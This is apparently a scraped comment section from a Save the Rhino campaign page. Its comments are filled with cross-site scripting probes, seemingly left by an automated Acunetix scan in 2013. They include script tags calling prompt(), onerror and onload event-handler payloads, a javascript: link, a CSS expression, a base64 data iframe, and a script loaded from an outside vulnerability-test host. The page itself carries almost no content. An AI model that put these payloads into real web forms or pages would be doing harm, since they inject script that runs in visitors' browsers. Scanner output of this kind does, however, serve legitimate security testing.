\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
# 1 on 23 January 2013 at 13:46:

'"()&%1<ScRiPt >prompt(985011)</ScRiPt>
# 1 on 23 January 2013 at 13:46:

OTY2NzM3
# 1 on 23 January 2013 at 13:46:

undefined1<ScRiPt >prompt(927429)</ScRiPt>
# 1 on 23 January 2013 at 13:46:

1<ScRiPt
>prompt(963414)</ScRiPt>
# 1 on 23 January 2013 at 13:46:

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928627></ScRiPt>
# 1 on 23 January 2013 at 13:46:

1<ScRiPt
>prompt(949559)</ScRiPt>
# 1 on 23 January 2013 at 13:46:

<video><source onerror="javascript:prompt(913611)">
# 1 on 23 January 2013 at 13:46:

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921678)"></g></svg>
# 1 on 23 January 2013 at 13:46:

1[url=javascript:prompt(945218)]http://www.acunetix.com[/url]
# 1 on 23 January 2013 at 13:46:

1<div style=width:expression(prompt(942875))>
# 1 on 23 January 2013 at 13:47:

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='907246'>
# 1 on 23 January 2013 at 13:47:

<body onload=prompt(982554)>
# 1 on 23 January 2013 at 13:47:

<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997766)>
# 1 on 23 January 2013 at 13:47:

<img src=xyz OnErRor=prompt(956629)>
# 1 on 23 January 2013 at 13:47:

1%3CScRiPt%20%3Eprompt(934275)%3C/sCripT%3E
# 1 on 23 January 2013 at 13:47:
# 1 on 23 January 2013 at 13:47:

<input autofocus onfocus=prompt(940629)>
# 1 on 23 January 2013 at 13:47:

kTpes
1<ScRiPt >prompt(953563)</ScRiPt>

Forever Wild - Save the Rhino Campaign

Volkswagen Amarok drives the Rhino Protection Initiative Jun 23. 2011 | Comments (798)

Leave a Comment

Sponsor

Links